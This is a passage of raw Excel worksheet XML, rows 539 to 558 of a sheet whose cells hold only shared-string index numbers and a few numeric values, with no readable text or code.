      <c r="M539" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N539" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O539" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P539" s="12" t="s">
        <v>4182</v>
      </c>
      <c r="Q539" s="12">
        <v>2.6</v>
      </c>
      <c r="R539" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S539" s="12" t="s">
        <v>4194</v>
      </c>
      <c r="T539" s="12" t="s">
        <v>3897</v>
      </c>
      <c r="U539" s="12" t="s">
        <v>4195</v>
      </c>
      <c r="V539" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W539" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X539" s="12">
        <v>2</v>
      </c>
      <c r="Y539" s="12" t="s">
        <v>4196</v>
      </c>
    </row>
    <row r="540" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A540" s="12">
        <v>2292</v>
      </c>
      <c r="B540" s="12" t="s">
        <v>28767</v>
      </c>
      <c r="D540" s="12" t="s">
        <v>28770</v>
      </c>
      <c r="F540" s="12" t="s">
        <v>29759</v>
      </c>
      <c r="G540" s="12" t="s">
        <v>4197</v>
      </c>
      <c r="H540" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I540" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J540" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K540" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L540" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M540" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N540" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O540" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P540" s="12" t="s">
        <v>4198</v>
      </c>
      <c r="Q540" s="12">
        <v>2.6</v>
      </c>
      <c r="R540" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S540" s="12" t="s">
        <v>4199</v>
      </c>
      <c r="T540" s="12" t="s">
        <v>552</v>
      </c>
      <c r="U540" s="12" t="s">
        <v>4200</v>
      </c>
      <c r="V540" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W540" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X540" s="12">
        <v>2</v>
      </c>
      <c r="Y540" s="12" t="s">
        <v>4201</v>
      </c>
    </row>
    <row r="541" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A541" s="12">
        <v>2295</v>
      </c>
      <c r="B541" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C541" s="12" t="s">
        <v>28797</v>
      </c>
      <c r="D541" s="12" t="s">
        <v>28798</v>
      </c>
      <c r="F541" s="12" t="s">
        <v>29759</v>
      </c>
      <c r="G541" s="12" t="s">
        <v>4202</v>
      </c>
      <c r="H541" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I541" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J541" s="12" t="s">
        <v>194</v>
      </c>
      <c r="K541" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L541" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M541" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N541" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O541" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P541" s="12" t="s">
        <v>4203</v>
      </c>
      <c r="Q541" s="12">
        <v>2.6</v>
      </c>
      <c r="R541" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S541" s="12" t="s">
        <v>4204</v>
      </c>
      <c r="T541" s="12" t="s">
        <v>4205</v>
      </c>
      <c r="U541" s="12" t="s">
        <v>4206</v>
      </c>
      <c r="V541" s="12" t="s">
        <v>197</v>
      </c>
      <c r="W541" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X541" s="12">
        <v>0</v>
      </c>
      <c r="Y541" s="12" t="s">
        <v>4207</v>
      </c>
    </row>
    <row r="542" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A542" s="12">
        <v>2298</v>
      </c>
      <c r="B542" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C542" s="12" t="s">
        <v>28799</v>
      </c>
      <c r="D542" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F542" s="12" t="s">
        <v>29758</v>
      </c>
      <c r="G542" s="12" t="s">
        <v>4208</v>
      </c>
      <c r="H542" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I542" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J542" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K542" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L542" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M542" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N542" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O542" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P542" s="12" t="s">
        <v>4198</v>
      </c>
      <c r="Q542" s="12">
        <v>2.6</v>
      </c>
      <c r="R542" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S542" s="12" t="s">
        <v>4209</v>
      </c>
      <c r="T542" s="12" t="s">
        <v>4210</v>
      </c>
      <c r="U542" s="12" t="s">
        <v>4211</v>
      </c>
      <c r="V542" s="12" t="s">
        <v>3476</v>
      </c>
      <c r="W542" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X542" s="12">
        <v>2</v>
      </c>
      <c r="Y542" s="12" t="s">
        <v>4212</v>
      </c>
    </row>
    <row r="543" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A543" s="12">
        <v>2301</v>
      </c>
      <c r="B543" s="12" t="s">
        <v>28800</v>
      </c>
      <c r="C543" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D543" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F543" s="12" t="s">
        <v>29759</v>
      </c>
      <c r="G543" s="12" t="s">
        <v>4213</v>
      </c>
      <c r="H543" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I543" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J543" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K543" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L543" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M543" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N543" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O543" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P543" s="12" t="s">
        <v>4214</v>
      </c>
      <c r="Q543" s="12">
        <v>2.6</v>
      </c>
      <c r="R543" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S543" s="12" t="s">
        <v>4215</v>
      </c>
      <c r="T543" s="12" t="s">
        <v>4216</v>
      </c>
      <c r="U543" s="12" t="s">
        <v>4217</v>
      </c>
      <c r="V543" s="12" t="s">
        <v>299</v>
      </c>
      <c r="W543" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X543" s="12">
        <v>3</v>
      </c>
      <c r="Y543" s="12" t="s">
        <v>4218</v>
      </c>
    </row>
    <row r="544" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A544" s="12">
        <v>2308</v>
      </c>
      <c r="B544" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C544" s="12" t="s">
        <v>28791</v>
      </c>
      <c r="D544" s="12" t="s">
        <v>28770</v>
      </c>
      <c r="F544" s="12" t="s">
        <v>29759</v>
      </c>
      <c r="G544" s="12" t="s">
        <v>4219</v>
      </c>
      <c r="H544" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I544" s="12" t="s">
        <v>145</v>
      </c>
      <c r="J544" s="12" t="s">
        <v>941</v>
      </c>
      <c r="K544" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L544" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M544" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N544" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O544" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P544" s="12" t="s">
        <v>4182</v>
      </c>
      <c r="Q544" s="12">
        <v>2.6</v>
      </c>
      <c r="R544" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S544" s="12" t="s">
        <v>4220</v>
      </c>
      <c r="T544" s="12" t="s">
        <v>3557</v>
      </c>
      <c r="U544" s="12" t="s">
        <v>4221</v>
      </c>
      <c r="V544" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W544" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X544" s="12">
        <v>0</v>
      </c>
      <c r="Y544" s="12" t="s">
        <v>4222</v>
      </c>
    </row>
    <row r="545" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A545" s="12">
        <v>2313</v>
      </c>
      <c r="B545" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D545" s="12" t="s">
        <v>28801</v>
      </c>
      <c r="E545" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F545" s="12" t="s">
        <v>29759</v>
      </c>
      <c r="G545" s="12" t="s">
        <v>4223</v>
      </c>
      <c r="H545" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I545" s="12" t="s">
        <v>145</v>
      </c>
      <c r="J545" s="12" t="s">
        <v>941</v>
      </c>
      <c r="K545" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L545" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M545" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N545" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O545" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P545" s="12" t="s">
        <v>4224</v>
      </c>
      <c r="Q545" s="12">
        <v>2.6</v>
      </c>
      <c r="R545" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S545" s="12" t="s">
        <v>4225</v>
      </c>
      <c r="T545" s="12" t="s">
        <v>46</v>
      </c>
      <c r="U545" s="12" t="s">
        <v>4226</v>
      </c>
      <c r="V545" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W545" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X545" s="12">
        <v>9</v>
      </c>
      <c r="Y545" s="12" t="s">
        <v>4227</v>
      </c>
    </row>
    <row r="546" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A546" s="12">
        <v>2321</v>
      </c>
      <c r="B546" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C546" s="12" t="s">
        <v>28802</v>
      </c>
      <c r="D546" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E546" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F546" s="12" t="s">
        <v>29759</v>
      </c>
      <c r="G546" s="12" t="s">
        <v>4237</v>
      </c>
      <c r="H546" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I546" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J546" s="12" t="s">
        <v>1203</v>
      </c>
      <c r="K546" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L546" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M546" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N546" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O546" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P546" s="12" t="s">
        <v>4238</v>
      </c>
      <c r="Q546" s="12">
        <v>2.6</v>
      </c>
      <c r="R546" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S546" s="12" t="s">
        <v>4239</v>
      </c>
      <c r="T546" s="12" t="s">
        <v>4240</v>
      </c>
      <c r="U546" s="12" t="s">
        <v>4241</v>
      </c>
      <c r="V546" s="12" t="s">
        <v>2864</v>
      </c>
      <c r="W546" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X546" s="12">
        <v>12</v>
      </c>
      <c r="Y546" s="12" t="s">
        <v>4242</v>
      </c>
    </row>
    <row r="547" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A547" s="12">
        <v>2332</v>
      </c>
      <c r="B547" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C547" s="12" t="s">
        <v>28804</v>
      </c>
      <c r="D547" s="12" t="s">
        <v>28805</v>
      </c>
      <c r="F547" s="12" t="s">
        <v>29759</v>
      </c>
      <c r="G547" s="12" t="s">
        <v>4247</v>
      </c>
      <c r="H547" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I547" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J547" s="12" t="s">
        <v>4248</v>
      </c>
      <c r="K547" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L547" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M547" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N547" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O547" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P547" s="12" t="s">
        <v>4198</v>
      </c>
      <c r="Q547" s="12">
        <v>2.6</v>
      </c>
      <c r="R547" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S547" s="12" t="s">
        <v>4249</v>
      </c>
      <c r="T547" s="12" t="s">
        <v>4244</v>
      </c>
      <c r="U547" s="12" t="s">
        <v>4250</v>
      </c>
      <c r="V547" s="12" t="s">
        <v>4251</v>
      </c>
      <c r="W547" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X547" s="12">
        <v>1</v>
      </c>
      <c r="Y547" s="12" t="s">
        <v>4252</v>
      </c>
    </row>
    <row r="548" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A548" s="12">
        <v>2335</v>
      </c>
      <c r="B548" s="12" t="s">
        <v>28375</v>
      </c>
      <c r="D548" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F548" s="12" t="s">
        <v>29759</v>
      </c>
      <c r="G548" s="12" t="s">
        <v>4253</v>
      </c>
      <c r="H548" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I548" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J548" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K548" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L548" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M548" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N548" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O548" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P548" s="12" t="s">
        <v>4254</v>
      </c>
      <c r="Q548" s="12">
        <v>2.6</v>
      </c>
      <c r="R548" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S548" s="12" t="s">
        <v>4255</v>
      </c>
      <c r="T548" s="12" t="s">
        <v>4256</v>
      </c>
      <c r="U548" s="12" t="s">
        <v>4257</v>
      </c>
      <c r="V548" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W548" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X548" s="12">
        <v>2</v>
      </c>
      <c r="Y548" s="12" t="s">
        <v>4258</v>
      </c>
    </row>
    <row r="549" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A549" s="12">
        <v>2337</v>
      </c>
      <c r="B549" s="12" t="s">
        <v>28774</v>
      </c>
      <c r="C549" s="12" t="s">
        <v>28791</v>
      </c>
      <c r="D549" s="12" t="s">
        <v>28806</v>
      </c>
      <c r="F549" s="12" t="s">
        <v>29759</v>
      </c>
      <c r="G549" s="12" t="s">
        <v>4259</v>
      </c>
      <c r="H549" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I549" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J549" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K549" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L549" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M549" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N549" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O549" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P549" s="12" t="s">
        <v>3788</v>
      </c>
      <c r="Q549" s="12">
        <v>2.6</v>
      </c>
      <c r="R549" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S549" s="12" t="s">
        <v>4260</v>
      </c>
      <c r="T549" s="12" t="s">
        <v>4261</v>
      </c>
      <c r="U549" s="12" t="s">
        <v>4262</v>
      </c>
      <c r="V549" s="12" t="s">
        <v>4263</v>
      </c>
      <c r="W549" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X549" s="12">
        <v>4</v>
      </c>
      <c r="Y549" s="12" t="s">
        <v>4264</v>
      </c>
    </row>
    <row r="550" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A550" s="12">
        <v>2345</v>
      </c>
      <c r="B550" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D550" s="12" t="s">
        <v>28807</v>
      </c>
      <c r="F550" s="12" t="s">
        <v>29759</v>
      </c>
      <c r="G550" s="12" t="s">
        <v>4266</v>
      </c>
      <c r="H550" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I550" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J550" s="12" t="s">
        <v>103</v>
      </c>
      <c r="K550" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L550" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M550" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N550" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O550" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P550" s="12" t="s">
        <v>4267</v>
      </c>
      <c r="Q550" s="12">
        <v>2.6</v>
      </c>
      <c r="R550" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S550" s="12" t="s">
        <v>4268</v>
      </c>
      <c r="T550" s="12" t="s">
        <v>4269</v>
      </c>
      <c r="U550" s="12" t="s">
        <v>4270</v>
      </c>
      <c r="V550" s="12" t="s">
        <v>1174</v>
      </c>
      <c r="W550" s="12">
        <v>2346</v>
      </c>
      <c r="X550" s="12">
        <v>3</v>
      </c>
      <c r="Y550" s="12" t="s">
        <v>4271</v>
      </c>
    </row>
    <row r="551" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A551" s="12">
        <v>2361</v>
      </c>
      <c r="B551" s="12" t="s">
        <v>28808</v>
      </c>
      <c r="C551" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D551" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F551" s="12" t="s">
        <v>29757</v>
      </c>
      <c r="G551" s="12" t="s">
        <v>4272</v>
      </c>
      <c r="H551" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I551" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J551" s="12" t="s">
        <v>122</v>
      </c>
      <c r="K551" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L551" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M551" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N551" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O551" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P551" s="12" t="s">
        <v>4198</v>
      </c>
      <c r="Q551" s="12">
        <v>2.6</v>
      </c>
      <c r="R551" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S551" s="12" t="s">
        <v>4273</v>
      </c>
      <c r="T551" s="12" t="s">
        <v>3751</v>
      </c>
      <c r="U551" s="12" t="s">
        <v>4274</v>
      </c>
      <c r="V551" s="12" t="s">
        <v>1864</v>
      </c>
      <c r="W551" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X551" s="12">
        <v>2</v>
      </c>
      <c r="Y551" s="12" t="s">
        <v>4275</v>
      </c>
    </row>
    <row r="552" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A552" s="12">
        <v>2366</v>
      </c>
      <c r="B552" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C552" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D552" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E552" s="12" t="s">
        <v>31425</v>
      </c>
      <c r="F552" s="12" t="s">
        <v>29759</v>
      </c>
      <c r="G552" s="12" t="s">
        <v>4276</v>
      </c>
      <c r="H552" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I552" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J552" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K552" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L552" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M552" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N552" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O552" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P552" s="12" t="s">
        <v>4265</v>
      </c>
      <c r="Q552" s="12">
        <v>2.6</v>
      </c>
      <c r="R552" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S552" s="12" t="s">
        <v>4277</v>
      </c>
      <c r="T552" s="12" t="s">
        <v>57</v>
      </c>
      <c r="U552" s="12" t="s">
        <v>4278</v>
      </c>
      <c r="V552" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W552" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X552" s="12">
        <v>10</v>
      </c>
      <c r="Y552" s="12" t="s">
        <v>4279</v>
      </c>
    </row>
    <row r="553" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A553" s="12">
        <v>2367</v>
      </c>
      <c r="B553" s="12" t="s">
        <v>29795</v>
      </c>
      <c r="C553" s="12" t="s">
        <v>28406</v>
      </c>
      <c r="D553" s="12" t="s">
        <v>28809</v>
      </c>
      <c r="E553" s="12" t="s">
        <v>31428</v>
      </c>
      <c r="F553" s="12" t="s">
        <v>29759</v>
      </c>
      <c r="G553" s="12" t="s">
        <v>4280</v>
      </c>
      <c r="H553" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I553" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J553" s="12" t="s">
        <v>36</v>
      </c>
      <c r="K553" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L553" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M553" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N553" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O553" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P553" s="12" t="s">
        <v>4281</v>
      </c>
      <c r="Q553" s="12">
        <v>2.4</v>
      </c>
      <c r="R553" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S553" s="12" t="s">
        <v>4282</v>
      </c>
      <c r="T553" s="12" t="s">
        <v>4283</v>
      </c>
      <c r="U553" s="12" t="s">
        <v>4284</v>
      </c>
      <c r="V553" s="12" t="s">
        <v>200</v>
      </c>
      <c r="W553" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X553" s="12">
        <v>5</v>
      </c>
      <c r="Y553" s="12" t="s">
        <v>4285</v>
      </c>
    </row>
    <row r="554" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A554" s="12">
        <v>2375</v>
      </c>
      <c r="B554" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C554" s="12" t="s">
        <v>28810</v>
      </c>
      <c r="D554" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E554" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F554" s="12" t="s">
        <v>29759</v>
      </c>
      <c r="G554" s="12" t="s">
        <v>4291</v>
      </c>
      <c r="H554" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I554" s="12" t="s">
        <v>152</v>
      </c>
      <c r="J554" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K554" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L554" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M554" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N554" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O554" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P554" s="12" t="s">
        <v>4265</v>
      </c>
      <c r="Q554" s="12">
        <v>2.6</v>
      </c>
      <c r="R554" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S554" s="12" t="s">
        <v>4292</v>
      </c>
      <c r="T554" s="12" t="s">
        <v>2749</v>
      </c>
      <c r="U554" s="12" t="s">
        <v>4293</v>
      </c>
      <c r="V554" s="12" t="s">
        <v>299</v>
      </c>
      <c r="W554" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X554" s="12">
        <v>15</v>
      </c>
      <c r="Y554" s="12" t="s">
        <v>4294</v>
      </c>
    </row>
    <row r="555" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A555" s="12">
        <v>2382</v>
      </c>
      <c r="B555" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C555" s="12" t="s">
        <v>28812</v>
      </c>
      <c r="D555" s="12" t="s">
        <v>28809</v>
      </c>
      <c r="E555" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F555" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G555" s="12" t="s">
        <v>28811</v>
      </c>
      <c r="H555" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I555" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J555" s="12" t="s">
        <v>181</v>
      </c>
      <c r="K555" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L555" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M555" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N555" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O555" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P555" s="12" t="s">
        <v>4281</v>
      </c>
      <c r="Q555" s="12">
        <v>2.4</v>
      </c>
      <c r="R555" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S555" s="12" t="s">
        <v>4301</v>
      </c>
      <c r="T555" s="12" t="s">
        <v>4302</v>
      </c>
      <c r="U555" s="12" t="s">
        <v>4303</v>
      </c>
      <c r="V555" s="12" t="s">
        <v>2391</v>
      </c>
      <c r="W555" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X555" s="12">
        <v>15</v>
      </c>
      <c r="Y555" s="12" t="s">
        <v>4304</v>
      </c>
    </row>
    <row r="556" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A556" s="12">
        <v>2388</v>
      </c>
      <c r="B556" s="12" t="s">
        <v>28813</v>
      </c>
      <c r="D556" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F556" s="12" t="s">
        <v>29757</v>
      </c>
      <c r="G556" s="12" t="s">
        <v>4305</v>
      </c>
      <c r="H556" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I556" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J556" s="12" t="s">
        <v>302</v>
      </c>
      <c r="K556" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L556" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M556" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N556" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O556" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P556" s="12" t="s">
        <v>4265</v>
      </c>
      <c r="Q556" s="12">
        <v>2.6</v>
      </c>
      <c r="R556" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S556" s="12" t="s">
        <v>4306</v>
      </c>
      <c r="T556" s="12" t="s">
        <v>4307</v>
      </c>
      <c r="U556" s="12" t="s">
        <v>4308</v>
      </c>
      <c r="V556" s="12" t="s">
        <v>3672</v>
      </c>
      <c r="W556" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X556" s="12">
        <v>1</v>
      </c>
      <c r="Y556" s="12" t="s">
        <v>4309</v>
      </c>
    </row>
    <row r="557" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A557" s="12">
        <v>2397</v>
      </c>
      <c r="B557" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C557" s="12" t="s">
        <v>28814</v>
      </c>
      <c r="D557" s="12" t="s">
        <v>28815</v>
      </c>
      <c r="F557" s="12" t="s">
        <v>29759</v>
      </c>
      <c r="G557" s="12" t="s">
        <v>4314</v>
      </c>
      <c r="H557" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I557" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J557" s="12" t="s">
        <v>36</v>
      </c>
      <c r="K557" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L557" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M557" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N557" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O557" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P557" s="12" t="s">
        <v>4198</v>
      </c>
      <c r="Q557" s="12">
        <v>2.6</v>
      </c>
      <c r="R557" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S557" s="12" t="s">
        <v>4315</v>
      </c>
      <c r="T557" s="12" t="s">
        <v>4316</v>
      </c>
      <c r="U557" s="12" t="s">
        <v>4317</v>
      </c>
      <c r="V557" s="12" t="s">
        <v>4318</v>
      </c>
      <c r="W557" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X557" s="12">
        <v>4</v>
      </c>
      <c r="Y557" s="12" t="s">
        <v>4319</v>
      </c>
    </row>
    <row r="558" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A558" s="12">
        <v>2403</v>
      </c>
      <c r="B558" s="12" t="s">
        <v>28816</v>
      </c>
      <c r="D558" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F558" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G558" s="12" t="s">
        <v>4325</v>
      </c>
